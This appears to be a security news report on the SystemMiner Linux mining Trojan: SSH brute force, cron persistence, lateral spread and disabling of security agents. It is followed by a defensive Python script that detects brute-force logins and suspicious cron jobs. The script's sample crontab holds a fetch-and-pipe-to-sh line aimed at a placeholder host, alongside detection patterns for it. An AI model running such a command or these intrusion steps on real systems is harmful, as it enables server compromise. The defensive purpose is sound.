Tencent Yujian: Beware the Linux mining Trojan SystemMiner, whose intruders block other mining URLs to monopolize mining resources

The Tencent Yujian Threat Intelligence Center said in a statement today that the Tencent security team recently handled a mining Trojan incident at an enterprise. One of the enterprise's Linux servers was suffering from system lag and high CPU usage. A security check of the affected server found that it had been compromised through an SSH weak-password brute-force attack. The intruder implants a scheduled task to achieve persistence. The scheduled task downloads and executes the parent malware, INT. INT has multiple bash commands built in, and it goes on to download and execute the Linux mining Trojan SystemMiner. In addition, the intruder uses operations and maintenance tools such as Ansible and knife to execute commands that infect other machines on the internal network in batches. To protect itself, the malware tries to download scripts that uninstall security products such as Tencent Cloud Mirror (Yunjing) and Alibaba Cloud Security Knight (Anqishi). It also blocks other mining URLs so that it has exclusive use of the mining resources.
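A triage sketch for the first two stages described above (SSH password brute force, then a scheduled task that downloads and runs a payload), added here as an example and not taken from Tencent's report. It assumes OpenSSH syslog-style log lines and that the scheduled task is a crontab entry; the function names, the failure threshold, and all sample lines, addresses and URLs are constructed.

```python
import re
from collections import defaultdict

# Constructed sample data (not from the incident); IPs are documentation ranges.
AUTH_LOG = "\n".join(
    [f"Jan 10 03:11:0{i} srv sshd[811]: Failed password for root from 203.0.113.7 port 4011{i} ssh2"
     for i in range(6)]
    + ["Jan 10 03:11:09 srv sshd[811]: Accepted password for root from 203.0.113.7 port 40120 ssh2",
       "Jan 10 08:00:00 srv sshd[900]: Failed password for admin from 198.51.100.4 port 50000 ssh2",
       "Jan 10 08:00:05 srv sshd[900]: Accepted password for admin from 198.51.100.4 port 50001 ssh2"])
CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
30 4 * * * wget -q https://mirror.example.org/list.txt -O /var/cache/list.txt
*/15 * * * * (curl -fsSL http://example.invalid/payload || wget -qO- http://example.invalid/payload) | sh
"""

FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+)")
ACCEPTED = re.compile(r"Accepted password for (\S+) from (\S+)")
FETCH = re.compile(r"\b(?:curl|wget)\b")
RUN_SHELL = re.compile(r"(?:\||;|&&)\s*(?:ba)?sh\b")  # output handed to sh/bash

def brute_force_then_login(log, threshold=5):
    """Return {source_ip: user} for password logins preceded by >= threshold failures."""
    failures = defaultdict(int)
    hits = {}
    for line in log.splitlines():
        if m := FAILED.search(line):
            failures[m.group(2)] += 1
        elif m := ACCEPTED.search(line):
            user, ip = m.groups()
            if failures[ip] >= threshold:  # a single mistyped password is not flagged
                hits[ip] = user
    return hits

def fetch_and_execute_jobs(crontab):
    """Return crontab entries that download content and pass it to a shell."""
    jobs = []
    for line in crontab.splitlines():
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        if FETCH.search(entry) and RUN_SHELL.search(entry):
            jobs.append(entry)
    return jobs

if __name__ == "__main__":
    print(brute_force_then_login(AUTH_LOG))
    print(fetch_and_execute_jobs(CRONTAB))
```

The cron check only matches entries that hand downloaded content straight to `sh` or `bash`; a job that saves the file and runs it in a later step needs a separate rule.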